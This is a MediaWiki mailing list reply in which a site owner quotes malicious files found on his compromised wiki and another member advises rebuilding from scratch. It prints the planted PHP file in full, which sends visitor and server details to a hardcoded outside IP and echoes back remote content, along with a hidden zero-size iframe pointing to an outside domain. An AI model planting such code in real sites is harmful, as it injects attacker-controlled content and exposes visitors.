Tim Ware wrote:
> I notice several files that seem to have modified at the docroot level:
>
> foter.php (never noticed this one before) with this content:
>
> <?php
> $ip = '209.62.27.83';
> $port = '80';
> $path = '/linkr/get/';
> $fp = fsockopen($ip, $port, $errno, $errstr, 30);
> if (!$fp) {
> echo '';
> } else {
> $post =
> "u
> =
> ".rawurlencode
> ($
> _SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
> $out = "POST ".$path." HTTP/1.0\r\n";
> $out .= "Host: ".$ip.":".$port."\r\n";
> $out .= "Content-Type: text/html\r\n";
> $out .= "Content-Length: ".strlen($post)."\r\n";
> $out .= "Connection: Close\r\n";
> $out .= "\r\n";
> $out .= $post;
> fwrite($fp, $out);
> $resp = '';
> while (!feof($fp)) {
> $resp .= fgets($fp, 128);
> }
> fclose($fp);
> $paths = split("\r\n\r\n", $resp);
> echo $paths[1];
> }
> ?>
>
>
>
> and this "m-analytics" code was added to an old index page and a
> google verification page:
>
>
> <iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a
> " width=0 height=0 style="hidden" frameborder=0 marginheight=0
> marginwidth=0 scrolling=no></iframe>
>
> Same thing happened to another wiki on this site, where the m-
> analytics iframe was added. I *did not* add this, so I suspect foul
> play.
>
> Thoughts?
>
> Tim
Backup everything and start from scratch.
The only files from the wiki you should need to keep are the uploads.
Remember to verify there aren't scripts there.
_______________________________________________
MediaWiki-l mailing list
[email protected]
https://lists.wikimedia.org/mailman/listinfo/mediawiki-l
